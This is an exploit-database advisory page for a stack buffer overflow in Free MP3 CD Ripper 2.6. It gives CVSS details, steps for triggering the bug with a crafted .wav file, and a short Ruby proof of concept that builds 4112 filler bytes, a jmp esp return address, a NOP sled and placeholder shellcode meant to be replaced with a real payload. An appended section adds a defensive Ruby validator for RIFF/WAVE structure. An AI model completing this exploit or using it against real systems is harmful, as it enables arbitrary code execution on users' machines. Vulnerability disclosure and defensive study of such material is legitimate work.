Free MP3 CD Ripper 2.6 (wav) Ruby PoC

2012.09.17
Credit: Richard leahy
Risk: High
Local: Yes
Remote: No
CWE: CWE-119


CVSS Base Score: 9.3/10
Impact Subscore: 10/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: Not required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

# Exploit Title: Free MP3 CD Ripper 2.6 (wav) 0-day
# Date: 30/03/2010
# Author: Richard leahy
# Software Link: http://www.soft32.com/Download/Free/Free_MP3_CD_Ripper/4-250188-1.html
# Version: 2.6
# Tested on: Windows Xp Sp2

#to exploit this open up the application select file -> wav converter -> wav to mp3
#use your favourite programming language and print out the contents into a text file. save the text
#file as a .wav
#then open up the wav file and boom.
#feel free to email me leahy_rich@hotmail.com

#code
#!/usr/bin/env ruby

nop = "\x90" # nop
shellcode = "\xCC" #just an interrupt can be replaced by proper shellcode
jmp_esp = "\x32\xfa\xca\x76" #find a jmp esp i will use imagehlp , little endian so reverse it
boom = "A" * 4112 + jmp_esp + nop * 50 + shellcode
puts boom
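The file produced by the steps above is plain text saved with a .wav extension, so it carries no RIFF/WAVE container. The following is an added example, not part of the original advisory or the vendor's code: a structural pre-check that flags such files before they are handed to a converter. The function name and both sample inputs are constructed for illustration.

```ruby
# Added example: structural pre-check for .wav files before conversion.
# wav_findings and the sample_* helpers are hypothetical names, not from the advisory.

# Returns a list of findings; an empty list means the container layout is sane.
def wav_findings(data)
  data = data.b                       # work on raw bytes
  findings = []
  return ["shorter than a 12-byte RIFF header"] if data.bytesize < 12

  magic, riff_size, form = data.unpack("a4Va4")
  findings << "missing RIFF magic" unless magic == "RIFF"
  findings << "form type is not WAVE" unless form == "WAVE"
  return findings unless findings.empty?

  if riff_size + 8 > data.bytesize
    findings << "declared RIFF size #{riff_size} exceeds file size"
  end

  # Walk the chunk list: each chunk is id(4) + little-endian size(4) + body,
  # padded to an even length.
  offset = 12
  seen = []
  while offset + 8 <= data.bytesize
    id, size = data.byteslice(offset, 8).unpack("a4V")
    if offset + 8 + size > data.bytesize
      findings << "chunk #{id.inspect} overruns the file"
      break
    end
    seen << id
    offset += 8 + size + (size & 1)
  end
  findings << "no fmt chunk" unless seen.include?("fmt ")
  findings << "no data chunk" unless seen.include?("data")
  findings
end

# Constructed samples: a minimal valid PCM file and a filler-only text file.
def sample_valid_wav
  fmt  = [1, 1, 8000, 8000, 1, 8].pack("vvVVvv")   # PCM, mono, 8 kHz, 8-bit
  pcm  = "\x80".b * 16
  body = "WAVE".b + "fmt ".b + [fmt.bytesize].pack("V") + fmt +
         "data".b + [pcm.bytesize].pack("V") + pcm
  "RIFF".b + [body.bytesize].pack("V") + body
end

def sample_filler_file
  "A" * 4200   # no RIFF container, like the text file described above
end
```

A clean result only means the container layout is well formed; it does not replace bounds checking inside the parser that reads the file.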

References:

http://www.securityfocus.com/bid/39672
http://www.osvdb.org/63349
http://www.exploit-db.com/exploits/18142
http://www.exploit-db.com/exploits/17727
http://www.exploit-db.com/exploits/11976
http://www.exploit-db.com/exploits/11975
http://secunia.com/advisories/39193


Copyright 2024, cxsecurity.com

 
